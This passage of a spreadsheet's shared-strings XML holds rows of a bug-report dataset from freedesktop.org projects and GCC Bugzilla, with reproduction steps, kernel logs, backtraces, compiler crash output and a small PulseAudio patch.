    <t>uim-pref-gtk enters an infinite loop</t>
  </si>
  <si>
    <t>uim-pref-gtk enters an infinite loop printing scheme debug messages.
How to reproduce:
(1) Run uim-pref-gtk in a terminal window.
(2) In the Toolbar group uncheck all the seven options.
(3) Save the configuration by pressing OK.
(4) Run uim-pref-gtk again in a terminal window.
(5) In the Toolbar group check the Enable menu-based input method switcher
    option.  This operation should have already caused a backtrace message
    in the terminal window.
(6) Click on the Apply button.
(7) Click on the OK button and an infinite loop.
Version: r3420
Platform: gcc version 4.0.3 Debian testing</t>
  </si>
  <si>
    <t>UPOWER-32253</t>
  </si>
  <si>
    <t>/sys path for remaining power changed in Linux 2.6.36</t>
  </si>
  <si>
    <t>Hi
in the Debian bug report http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=601587 it was reported that a /sys filename has changed in Linux 2.6.36 per commit b137b9942a07843c64a934cfdb7d43155e507e13. This renders the remaining-time-to-depletion information defunct.
Greetings
Joachim</t>
  </si>
  <si>
    <t>DRI-69790</t>
  </si>
  <si>
    <t>[HSW ULT] testdisplay : The output of 720x576 mode  is dislocated</t>
  </si>
  <si>
    <t>Created attachment 86503
dmesg: 720x576 mode dislocated
System Environment:
--------------------------------------------
Kernel: (drm-intel-next-queued)1b068ee25776533074251f1c6276c5f720c0284b
Some additional commit info:
Author: Jani Nikula 
Date:   Fri Sep 20 16:42:17 2013 +0300
    drm/i915/dp: read DPCD PSR capability only on eDP
Description:
--------------------------------------------
When I test display in 720x576  mode with argument -a-d or -tthe image dislocated.
CRTS(3):[0]  720x576 50 720 732 796 864 576 581 586 625 0xa 0x40 27000
Reproduce steps:
--------------------------------------------
1. plug in HDMI
2. boot up machine
3. testdisplay</t>
  </si>
  <si>
    <t>qingshuai.tian</t>
  </si>
  <si>
    <t>XORG-26364</t>
  </si>
  <si>
    <t>[i915] Screen blanks to a random color</t>
  </si>
  <si>
    <t>Created attachment 32972
xorg log
Hi
i have a funny and quite annoying problem. Im not even sure but it seems its got to do with the video driver. It happens randomly after coming back from suspend to ram (im kind of sure of this). First of all i notice some kind of quick flips that happen once every few minutes... then sometimes the screen just goes full pink or blue or black (i got all these colors but i guess there can be more!) and stays like that even if I remote-kill Xorg or switch to level 3. Everythings seems to work under it (i can ssh etc) but there's no way to get rid of it.
The problem has appeared after upgrading kernel to latest development version (2.6.33-rcX) and the Xorg drivers with it. Before that i was using an older kernel with modesetting disabled older drivers. My computer model is listed in intel_lvds.c as one of those not reporting lid status properly. I have a 945GME intel card. I have attached the xorg.0.log since it has information about all driver versions etc...
I have not much idea of how to get more information about and i cannot reproduce really reproduce it at will :S but I'll be glad to provide more info if needed.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-60399</t>
  </si>
  <si>
    <t>New account request: Philip Withnall</t>
  </si>
  <si>
    <t>Created attachment 74322
SSH key
- Full name: Philip Withnall
 - E-mail address: philip at tecnocode.co.uk
 - Preferred account name: pwithnall</t>
  </si>
  <si>
    <t>DRI-37514</t>
  </si>
  <si>
    <t>[Intel] I2C eeprom probes can hang</t>
  </si>
  <si>
    <t>As of Linux 2.6.39 (Debian linux-image-2.6.39-1-amd64 version 2.6.39-1) loading the eeprom I2C module hangs both on a desktop with a Q35 and on a laptop with a GM45.  The system is otherwise responsive though that makes no practical difference if it's configured to load eeprom at boot (as my desktop was until now per sensors-detect's suggestion).
On my laptop (a Thinkpad R500) the relevant kernel messages were
[ 2904.484147] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.540156] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.596159] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.652153] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.708158] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.764159] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.820147] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2904.876159] [drm] GMBUS timed out falling back to bit banging on pin 0 [i915 gmbus disabled]
[ 2905.584162] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.640162] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.696046] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.752155] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.808119] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.864110] [drm] GMBUS timed out falling back to bit banging on pin 6 [i915 gmbus reserved]
[ 2905.920157] [drm] GMBUS timed out falling back to bit banging on pin 7 [i915 gmbus dpd]
[ 3120.492233] INFO: task modprobe:8678 blocked for more than 120 seconds.
[ 3120.492242] echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs disables this message.
[ 3120.492248] modprobe        D ffff8800a32b27a0     0  8678   8677 0x00000004
[ 3120.492259]  ffff8800a32b27a0 0000000000000082 ffff8800a32b27a0 ffff8800a32a6e40
[ 3120.492271]  0000000000013b40 ffff880086ef7fd8 ffff880086ef7fd8 0000000000013b40
[ 3120.492282]  ffff8800a32b27a0 ffff880086ef6010 ffff8800a32b27a0 ffff880086ef6000
[ 3120.492293] Call Trace:
[ 3120.492352]  [] ? __mutex_lock_common+0x127/0x193
[ 3120.492383]  [] ? i2c_add_numbered_adapter+0xad/0xad [i2c_core]
[ 3120.492391]  [] ? mutex_lock+0x1a/0x33
[ 3120.492406]  [] ? i2c_add_adapter+0x36/0x86 [i2c_core]
[ 3120.492416]  [] ? snprintf+0x36/0x3b
[ 3120.492430]  [] ? __i2c_bit_add_bus+0x1e9/0x22c [i2c_algo_bit]
[ 3120.492459]  [] ? intel_gpio_create+0x124/0x13d [i915]
[ 3120.492486]  [] ? gmbus_xfer+0x3ef/0x46d [i915]
[ 3120.492503]  [] ? i2c_transfer+0xa1/0xdd [i2c_core]
[ 3120.492520]  [] ? i2c_smbus_xfer_emulated+0x2f3/0x3fd [i2c_core]
[ 3120.492529]  [] ? kobject_get+0x12/0x17
[ 3120.492539]  [] ? get_device+0x14/0x1b
[ 3120.492548]  [] ? klist_add_tail+0x1f/0x41
[ 3120.492556]  [] ? device_add+0x4de/0x5d7
[ 3120.492572]  [] ? i2c_default_probe+0x99/0xfd [i2c_core]
[ 3120.492589]  [] ? i2c_do_add_adapter+0xcf/0x22b [i2c_core]
[ 3120.492605]  [] ? i2c_do_add_adapter+0x22b/0x22b [i2c_core]
[ 3120.492615]  [] ? bus_for_each_dev+0x44/0x78
[ 3120.492631]  [] ? i2c_do_add_adapter+0x22b/0x22b [i2c_core]
[ 3120.492647]  [] ? i2c_for_each_dev+0x2c/0x47 [i2c_core]
[ 3120.492668]  [] ? 0xffffffffa0044fff
[ 3120.492684]  [] ? i2c_register_driver+0x9c/0xa2 [i2c_core]
[ 3120.492695]  [] ? 0xffffffffa0044fff
[ 3120.492704]  [] ? do_one_initcall+0x78/0x131
[ 3120.492714]  [] ? sys_init_module+0xd3/0x221
[ 3120.492722]  [] ? system_call_fastpath+0x16/0x1b
On my desktop the details were only slightly different: when pin 0 didn't pan out the kernel moved on to pin 1 (i915 gmbus ssc) which led to the same failure mode on the first try.  In contrast 2.6.38 on my desktop reported eight attempts on each of pin 0 and pin 6 after which it moved on with no further messages from the DRM subsystem.  (I haven't tested with older kernel versions on my laptop should I?)
See also http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=627575.</t>
  </si>
  <si>
    <t>amu</t>
  </si>
  <si>
    <t>WAYLAND-93836</t>
  </si>
  <si>
    <t>Weston crashes after clicking a Firefox menu when the main window doesnâ€™t have the focus</t>
  </si>
  <si>
    <t>Created attachment 121236
gdb backtrace
How to reproduce:
- Start Weston
- Launch Firefox and another client
- Focus Firefox
- Right-click somewhere to open a contextual menu
- Alt-Tab to the other client the menu stays there
- Mouse events are still handled by the menu but clicking any option will make Weston crash with the attached backtrace.</t>
  </si>
  <si>
    <t>XORG-47203</t>
  </si>
  <si>
    <t>libxt 1.1.2 breaks xscreensaver</t>
  </si>
  <si>
    <t>libxt 1.1.2 breaks some themes in xscreensaver.  For example select bumps and xscreensaver displays corrupted graphics and reports an error Warning: Select failed error code 5.  Downgrading to the previous version of libxt solves the problem.  Rebuiling xscreensaver has no effect.</t>
  </si>
  <si>
    <t>davemorgan353</t>
  </si>
  <si>
    <t>XORG-21626</t>
  </si>
  <si>
    <t>[i945 DRI1] Cursor movement screenshot clipping and redraw problems on dual-headed desktop</t>
  </si>
  <si>
    <t>Created attachment 25621
Xorg.0.log
Forwarding this bug from a Ubuntu reporter:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/302227
[Problem]
On dual-head setup mouse cursor movement is restricted to a 800x600 window unless dragging outside this area redraw in compiz is affected as well.
[Discussion]
First shown with Compiz enabled on a two-screen netbook (Acer Aspire One external 1024x768 screen to the right of built-in LCD) setup. Anything past the leftmost 800x600 would not be erased after being drawn and external monitor resolution would be misdetected.
Upon disabling Compiz things are properly erased but after login the pointer is restricted to the leftmost 800x600 rectangle and I need to drag something outside the rectangle to be able to move the pointer freely.
Since the redraw vestiges happen only outside an 800x600 window (the same size the greeter used) it is possible that the background window (or however it may be called in Z/Compiz-speak) responsible for ensuring things get erased when needed is being sized at the same size the greeter used (800x600 in this case) instead of the size of the combined monitor area (2048x768).
- Can't drag mouse outside leftmost 800x600 region
- Can't drag icons outside leftmost 800x600 region
- Screenshots only grab the leftmost 800x600 rectangle (so I can't show most of what I am experiencing)
- Right-clicking icons in the top Gnome bar makes the pop-up menu appear in the leftmost position of the external monitor
One more comment: X/Compiz work fine on the LCD-only configuration. The 800x600 rectangle the cursor is confined to in the double-headed config is notable because it's the same resolution that the GDM takes (probably because it's the largest VESA-like mode both monitors can show).
I had the opportunity to hook up the laptop to a couple odd monitors (I have a collection of interesting computers and recently got a couple Intergraph behemoths with coax and DB-15 connections). All were misdetected and the same rendering and pointer confinement anomalies happened.
The problem is present in Jaunty. Using xserver-xorg-video-intel 2:2.6.3-0ubuntu9 and compiz 1:0.8.2-0ubuntu8 more or less the same dual-monitor oddness persists. The difference is the login screen is not squashed in the built-in widescreen display but is 800x600 on the secondary (still misdetected) monitor. Desktop background and mouse movement are still limited to the top-left 800x600 rectangle of the multi-head desktop until I drag the mouse. Windows are still not properly erased outside the top-left 800x600 region.
Oddly enough the problem vanished when I started the computer with the second monitor plugged in but turned off this morning and rearranged the dual-screen config with the screen applet. X still but started with mirrored screens at 800x600.
[lspci]
00:00.0 Host bridge [0600]: Intel Corporation Mobile 945GME Express Memory Controller Hub [8086:27ac] (rev 03)
	Subsystem: Acer Incorporated [ALI] Device [1025:015b]
00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 945GME Express Integrated Graphics Controller [8086:27ae] (rev 03)
	Subsystem: Acer Incorporated [ALI] Device [1025:015b]
[xorg.conf]
Section Screen
 Identifier Configured Screen Device
 Device Configured Video Device
 SubSection Display
  Virtual 2048 768
 EndSubSection
EndSection
Section Device
 Identifier Configured Video Device
EndSection</t>
  </si>
  <si>
    <t>PULSEAUDIO-66774</t>
  </si>
  <si>
    <t>crash when shutting down without any modules loaded</t>
  </si>
  <si>
    <t>If all the modules given fail to load the daemon will try to shut down and crash when trying to clean up:
E: [pulseaudio] main.c: Module load failed.
E: [pulseaudio] main.c: Failed to initialize daemon.
E: [pulseaudio] xmalloc.c: Assertion 'size &gt; 0' failed at pulse/xmalloc.c:62 function pa_xmalloc(). Aborting.
Easily fixed with this patch:
Index: src/pulsecore/module.c
===================================================================
--- src/pulsecore/module.c	(revision 27650)
+++ src/pulsecore/module.c	(working copy)
@@ -2176 +2179 @@
     pa_assert(c)
     pa_assert(c-&gt;modules)
+    if (pa_idxset_isempty(c-&gt;modules))
+        return
+
     /* Unload modules in reverse order by default */
     indices = pa_xnew(uint32_t pa_idxset_size(c-&gt;modules))
     i = 0</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30725</t>
  </si>
  <si>
    <t>Don't need to specify OS in device names</t>
  </si>
  <si>
    <t>Created attachment 39298
patch
The attached patch remove Android Phone from device's names</t>
  </si>
  <si>
    <t>gcc_bug_report_data.csv</t>
  </si>
  <si>
    <t>GCC-49282</t>
  </si>
  <si>
    <t>middle-end</t>
  </si>
  <si>
    <t>GCC</t>
  </si>
  <si>
    <t>malloc corruption in large lto1-wpa run during inline edge heap resize</t>
  </si>
  <si>
    <t>A large lto1-wpa run with 20110603 results now in
malloc.c:3551: munmap_chunk: Assertion `ret == 0' failed.
on x86-64-linux.
When I run with MALLOC_CHECK_=2 it seems to get a bit further but eventually
aborts (and deadlocks because the abort-&gt;internal_error handler calls
malloc again)
Here's the original trace for the malloc that aborts (with MALLOC_CHECK_=2)
Any suggestions for patches to try to revert? Note full bisect
is difficult because this run depends on some earlier fixes.
Not uploading a test case currently because it's quite large.
#10 0x00002b236701d4e5 in raise () from /lib64/libc.so.6
#11 0x00002b236701e9b0 in abort () from /lib64/libc.so.6
#12 0x00002b236705df1a in ?? () from /lib64/libc.so.6
#13 0x00002b23670640d7 in ?? () from /lib64/libc.so.6
#14 0x0000000000b2684d in xrealloc (oldmem=Unhandled dwarf expression opcode 0xf3
) at ../../gcc/libiberty/xmalloc.c:179
#15 0x000000000083e528 in vec_heap_o_reserve_1 (vec=0x2b23ea786010 reserve=Unhandled dwarf ex
pression opcode 0xf3
)
    at ../../gcc/gcc/vec.c:313
#16 0x00000000005ea27f in VEC_inline_edge_summary_t_heap_reserve_exact (
    alloc_= vec_=)
    at ../../gcc/gcc/ipa-inline.h:128
#17 VEC_inline_edge_summary_t_heap_safe_grow (alloc_=
    vec_=) at ../../gcc/gcc/ipa-inline.h:128
#18 VEC_inline_edge_summary_t_heap_safe_grow_cleared (alloc_=
    vec_=) at ../../gcc/gcc/ipa-inline.h:128
#19 inline_summary_alloc (alloc_= vec_=)
    at ../../gcc/gcc/ipa-inline-analysis.c:646
#20 0x00000000005ea3c1 in inline_edge_duplication_hook (src=0x2b2499f41680
    dst=0x2b243e2d7680 data=Unhandled dwarf expression opcode 0xf3
) at ../../gcc/gcc/ipa-inline-analysis.c:853
#21 0x00000000004e995c in cgraph_call_edge_duplication_hooks (cs2=0x2b243e2d7680
    cs1=0x2b2499f41680) at ../../gcc/gcc/cgraph.c:376
#22 cgraph_clone_edge (cs2=0x2b243e2d7680 cs1=0x2b2499f41680) at ../../gcc/gcc/cgraph.c:2127
#23 0x00000000004e9c1d in cgraph_clone_node (n=0x2b2499f286f0 decl=0x2b2395b15500 count=Unha
ndled dwarf expression opcode 0xf3
)
    at ../../gcc/gcc/cgraph.c:2196
#24 0x00000000005eeb9f in clone_inlined_nodes (e=0x2b2499f4a6e8 duplicate=1 '\001'
    update_original=1 '\001' overall_size=0x102e488)</t>
  </si>
  <si>
    <t>unassigned</t>
  </si>
  <si>
    <t>andi-gcc</t>
  </si>
  <si>
    <t>GCC-36574</t>
  </si>
  <si>
    <t>[4.4 Regression] build broken with cgraph changes</t>
  </si>
  <si>
    <t>With r136888 cris-elf built (and had just 4 regressions compared to earlier this year).  With r136894 and up to at least r136933 build breaks with the following cutnpasted:
libtool: compile:  /tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -shared-libgcc -B/tmp/hpautotest\
-gcc1/cris-elf/gccobj/./gcc -nostdinc++ -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v\
3/src -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/src/.libs -nostdinc -B/tmp/hpaut\
otest-gcc1/cris-elf/gccobj/cris-elf/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/\
newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cr\
is-elf/gccobj/cris-elf/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/libno\
sys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/t\
mp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/i\
nclude -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include -I/tmp/hpautotest-gcc1/cris-\
elf/gccobj/cris-elf/libstdc++-v3/include/cris-elf -I/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/l\
ibstdc++-v3/include -I/tmp/hpautotest-gcc1/gcc/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall\
 -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-se\
ctions -g -O2 -I/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/backward -Wno-de\
precated -c /tmp/hpautotest-gcc1/gcc/libstdc++-v3/src/strstream.cc -o strstream.o
void std::istrstream::_ZTv0_n12_NSt10istrstreamD0Ev()/301(-1): availability:available 19 insns need\
ed tree finalized inlinable
  called by:
  calls: void *.LTHUNK2()/523 (1.00 per call)
void std::istrstream::_ZTv0_n12_NSt10istrstreamD1Ev()/300(-1): availability:available 19 insns need\
ed tree finalized inlinable
  called by:
  calls: void *.LTHUNK3()/524 (1.00 per call)
void std::ostrstream::_ZTv0_n12_NSt10ostrstreamD0Ev()/299(-1): availability:available 19 insns need\
ed tree finalized inlinable
  called by:
  calls: void *.LTHUNK0()/521 (1.00 per call)
void std::ostrstream::_ZTv0_n12_NSt10ostrstreamD1Ev()/298(-1): availability:available 19 insns need\
ed tree finalized inlinable
  called by:
  calls: void *.LTHUNK1()/522 (1.00 per call)
void std::strstream::_ZTv0_n12_NSt9strstreamD0Ev()/289(-1): availability:available 19 insns needed \
tree finalized inlinable
  called by:
  calls: void *.LTHUNK6()/527 (1.00 per call)
void std::strstream::_ZTv0_n12_NSt9strstreamD1Ev()/288(-1): availability:available 19 insns needed \
tree finalized inlinable
  called by:
  calls: void *.LTHUNK4()/525 (1.00 per call)
/tmp/hpautotest-gcc1/gcc/libstdc++-v3/src/strstream.cc:419: internal compiler error: nodes with no \
released memory found
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [strstream.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-77269</t>
  </si>
  <si>
    <t>__builtin_isinf_sign does not work for __float128</t>
  </si>
  <si>
    <t>The __builtin_isinf_sign folding does
        tree signbit_fn = mathfn_built_in_1
          (TREE_TYPE (arg) CFN_BUILT_IN_SIGNBIT 0)
which only works for float double and long double.  This means that despite both __builtin_isinf and (since the fix for bug 36757) __builtin_signbit being type-generic and so working for other floating-point types such as __float128 without needing any type-specific variants of the built-in functions to exist for those types __builtin_isinf_sign does not instead you get undefined references to __builtin_isinf_sign at link time if you call it for __float128 arguments.
E.g. on x86_64
int f (__float128 a) { return __builtin_isinf_sign (a) }
generates a call to __builtin_isinf_sign when it should be expanded inline even for -O0 (and glibc currently expects to be able to use __builtin_isinf_sign in defining the isinf macro).</t>
  </si>
  <si>
    <t>jsm28</t>
  </si>
  <si>
    <t>GCC-78479</t>
  </si>
  <si>
    <t>fortran</t>
  </si>
  <si>
    <t>ICE in gfc_apply_init at fortran/expr.c:4135</t>
  </si>
  <si>
    <t>With valid code down to at least 4.8 :
$ cat z1.f90
program p
   type t
      character(3) :: c(1) = 'a' // ['b']
   end type
end
$ cat z2.f90
program p
   type t
      character(1) :: c(1) = 'a' // ['b']
   end type
end
$ gfortran-7-20161120 z1.f90
f951: internal compiler error: Segmentation fault
0xc4265f crash_signal
        ../../gcc/toplev.c:333
0x68f1b2 gfc_apply_init(gfc_typespec* symbol_attribute* gfc_expr*)
        ../../gcc/fortran/expr.c:4135
0x6828bf build_struct
        ../../gcc/fortran/decl.c:1943
0x6828bf variable_decl
        ../../gcc/fortran/decl.c:2443
0x6828bf gfc_match_data_decl()
        ../../gcc/fortran/decl.c:4898
0x6daa89 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6de03e match_word
        ../../gcc/fortran/parse.c:377
0x6de03e decode_statement
        ../../gcc/fortran/parse.c:377
0x6dfe44 next_free
        ../../gcc/fortran/parse.c:1180
0x6dfe44 next_statement
        ../../gcc/fortran/parse.c:1413
0x6e138a parse_derived
        ../../gcc/fortran/parse.c:3233
0x6e138a parse_spec
        ../../gcc/fortran/parse.c:3773
0x6e3bc3 parse_progunit
        ../../gcc/fortran/parse.c:5615
0x6e51b4 gfc_parse_file()
        ../../gcc/fortran/parse.c:6124
0x729052 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>kargl</t>
  </si>
  <si>
    <t>gerhard.steinmetz.fortran</t>
  </si>
  <si>
    <t>GCC-632</t>
  </si>
  <si>
    <t>c++</t>
  </si>
  <si>
    <t>Internal compiler error in `layout_decl' at stor-layout.c:274</t>
  </si>
  <si>
    <t>g++  -I/home/leila/Sources/Include -O2 -Wall -Woverloaded-virtual -Wwrite-strings  -c -o AffixParser.o AffixParser.cc
AffixParser.cc:421:   instantiated from here
/usr/include/g++/stl_function.h:223: `binder2nd__default_alloc_template &gt;vector &gt; &gt; &amp;basic_string__default_alloc_template &gt;bool&gt; &gt;::operator ()(...)' must be a nonstatic member function
/usr/include/g++/stl_function.h: In function `{error} binder2nd__default_alloc_template &gt;vector &gt; &gt; &amp;basic_string__default_alloc_template &gt;bool&gt; &gt;::operator ()(...)':
/usr/include/g++/stl_function.h:223: Internal compiler error in `layout_decl' at stor-layout.c:274
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Linux 2.2.13</t>
  </si>
  <si>
    <t>lkh</t>
  </si>
  <si>
    <t>GCC-4071</t>
  </si>
  <si>
    <t>libstdc++</t>
  </si>
  <si>
    <t>make install installs .../include/g++-v3/Makefile</t>
  </si>
  <si>
    <t>[I couldn't work out which category/class problems like this should go
under ... there doesn't appear to be an install class.]
Did make bootstrap as normal user and make install as root.
I keep a list of all files installed (for later clean-up) and when
cross-checking what needed keeping between gcc 3.0 and gcc 3.0.1
noticed that
    /usr/local/include/g++-v3/Makefile
existed in 3.0.1 and not 3.0.
A quick check showed that this was a copy of
    /i686-pc-linux-gnu/libstdc++-v3/include/Makefile
The install-data-local: rule from that Makefile installs all
files in the directory (except stamp-*) into .../include/g++-v3
this of course includes Makefile.
Release:
3.0.1
Environment:
System: Linux derisoft.derived-software.demon.co.uk 2.4.5-5mdk #1 Sat Jun 16 08:08:07 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --prefix=/usr/local --enable-threads
How-To-Repeat:
[./configure in srcdir - you do not see this problem
when configure is run in $objdir != $srcdir -ljrittle.]
make bootstrap
make install
(not double checked but that's what I did to cause it!)</t>
  </si>
  <si>
    <t>bkoz</t>
  </si>
  <si>
    <t>pgr</t>
  </si>
  <si>
    <t>GCC-67037</t>
  </si>
  <si>
    <t>rtl-optimization</t>
  </si>
  <si>
    <t>[4.9 Regression] Wrong code at -O1 and above on ARM</t>
  </si>
  <si>
    <t>Created attachment 36076
testcase
The reduced testcase (based on real code from wine sources) crashes:
notaz@evm:/tmp/t$ cc -Wall -O0 testcase.c &amp;&amp; ./a.out
notaz@evm:/tmp/t$ cc -Wall -O1 testcase.c &amp;&amp; ./a.out
Segmentation fault
notaz@evm:/tmp/t$ cc -Wall -O2 testcase.c &amp;&amp; ./a.out
Segmentation fault
notaz@evm:/tmp/t$ cc -Wall -Os testcase.c &amp;&amp; ./a.out
notaz@evm:/tmp/t$ cc -Wall -O1 testcase.c -mcpu=arm920t -marm &amp;&amp; ./a.out
Segmentation fault
notaz@evm:/tmp/t$ cc -Wall -O1 testcase.c -mcpu=cortex-a15 &amp;&amp; ./a.out
Segmentation fault
gcc 4.7.2 and 4.8.2 seem to be ok.
It looks like this chunk
    while ((count &gt; 1) &amp;&amp; *s)
    {
        count--
        *d++ = *s++
    }
is compiled to
        add     r3 sp #5312
        add     r3 r3 #52
        ldr     r3 [r3]        @ count
        cmp     r3 #1
        bls     .L6
        movw    r2 #:lower16:.LANCHOR0
        mov     r3 #78
        movt    r2 #:upper16:.LANCHOR0
        b       .L8
.L18:
        ldrh    r3 [r2 #2]!
        cmp     r3 #0
        beq     .L9
.L8:
        add     r1 sp #5312
        add     r1 r1 #52
        ldr     r0 [r1]
        sub     r0 r0 #1
        str     r0 [r1]
        ldr     r1 [r3]        @ &lt;-- crash
        cmp     r0 #1
        strh    r3 [r1] #2    @ movhi
        add     r3 sp #5312
        add     r3 r3 #48
        str     r1 [r3]
        bne     .L18
.L9:
so it thinks r3 contains pointer to count even though it loaded *s there?
The conditions for this bug seem to be large stack frame that load/store offsets can't reach and enough register pressure.</t>
  </si>
  <si>
    <t>bernd.edlinger</t>
  </si>
  <si>
    <t>GCC-83112</t>
  </si>
  <si>
    <t>libgcc</t>
  </si>
  <si>
    <t>Silence warnings from PowerPC libgcc float128-ifunc.c compilation</t>
  </si>
  <si>
    <t>The ifunc handlers in libgcc to switch between using PowerPC ISA 2.07 software emulation for IEEE 128-bit floating point and ISA 3.0 hardware instructions get a lot of warnings due to the new option -Wattribute-alias.
The solution is to change the ifunc handler from returning void * to a pointer to the appropriate function.</t>
  </si>
  <si>
    <t>meissner</t>
  </si>
  <si>
    <t>GCC-7111</t>
  </si>
  <si>
    <t>cout of null pointer causes core dump</t>
  </si>
  <si>
    <t>Trying to print a null character pointer causes this program to core dump.  This works fine under GCC 2.95.  I know null pointers are sensitive and am not completely sure if this is truly a bug or what the correct way of handling this is.
Release:
gcc version 3.1
Environment:
Sun SunOS 5.8
How-To-Repeat:
Compile it and run it.  If I change the char* to be void* it works fine.</t>
  </si>
  <si>
    <t>rdhunt</t>
  </si>
  <si>
    <t>GCC-18737</t>
  </si>
  <si>
    <t>ICE on invalid use of external keyword</t>
  </si>
  <si>
    <t>$ cat a.f90 
program test
  implicit none
  real(8) :: x
  external bug
  x = 2
  print * bug(x)
end program test
$ gfortran -c a.f90
a.f90: In function â€˜MAIN__â€™:
a.f90:7: internal compiler error: in gfc_typenode_for_spec at
fortran/trans-types.c:613</t>
  </si>
  <si>
    <t>fxcoudert</t>
  </si>
  <si>
    <t>GCC-58603</t>
  </si>
  <si>
    <t>target</t>
  </si>
  <si>
    <t>[4.9 Regression] hash-table.h:962: error: anachronistic old-style base class initia</t>
  </si>
  <si>
    <t>In stage1 with gcc 4.4.7 build fails:
g++ -c   -g -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wwrite-strings -Wcast-qual -mdisable-indexing -Wmissing-format-attribute -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I.. -I. -Iada -I../../gcc/gcc -I../../gcc/gcc/ada -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu/gcc/gmp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../libbacktrace    ../../gcc/gcc/ada/gcc-interface/trans.c -o ada/trans.o
In file included from ../../gcc/gcc/gimple.h:26
                 from ../../gcc/gcc/ada/gcc-interface/trans.c:36:
../../gcc/gcc/hash-table.h: In constructor 'hash_table::iterator::iterator()':
../../gcc/gcc/hash-table.h:962: error: anachronistic old-style base class initializer
../../gcc/gcc/hash-table.h:962: error: unnamed initializer for 'hash_table::iterator' which has no base classes
../../gcc/gcc/hash-table.h:962: error: expected primary-expression before 'int'
../../gcc/gcc/hash-table.h:962: error: expected '{' before '(' token
../../gcc/gcc/hash-table.h: At global scope:
../../gcc/gcc/hash-table.h:962: error: expected unqualified-id before 'unsigned'
../../gcc/gcc/hash-table.h:962: error: expected ')' before 'unsigned'
../../gcc/gcc/hash-table.h:962: error: expected ')' before 'unsigned'
../../gcc/gcc/hash-table.h: In constructor 'hash_table::iterator::iterator(typename Descriptor::value_type** typename Descriptor::value_type**)':
../../gcc/gcc/hash-table.h:973: error: anachronistic old-style base class initializer
../../gcc/gcc/hash-table.h:973: error: unnamed initializer for 'hash_table::iterator' which has no base classes
../../gcc/gcc/hash-table.h:973: error: expected primary-expression before 'int'
../../gcc/gcc/hash-table.h:973: error: expected '{' before '(' token
../../gcc/gcc/hash-table.h: At global scope:
../../gcc/gcc/hash-table.h:973: error: expected unqualified-id before 'unsigned'
../../gcc/gcc/hash-table.h:973: error: expected ')' before 'unsigned'
../../gcc/gcc/hash-table.h:973: error: expected ')' before 'unsigned'
make[3]: *** [ada/trans.o] Error 1</t>
  </si>
  <si>
    <t>danglin</t>
  </si>
  <si>
    <t>GCC-38480</t>
  </si>
  <si>
    <t>tree-optimization</t>
  </si>
  <si>
    <t>bogus warning with -O3 -Wall: array subscript is above array bounds</t>
  </si>
  <si>
    <t># gcc -v
Using built-in specs.
Target: i486-linux-gnu
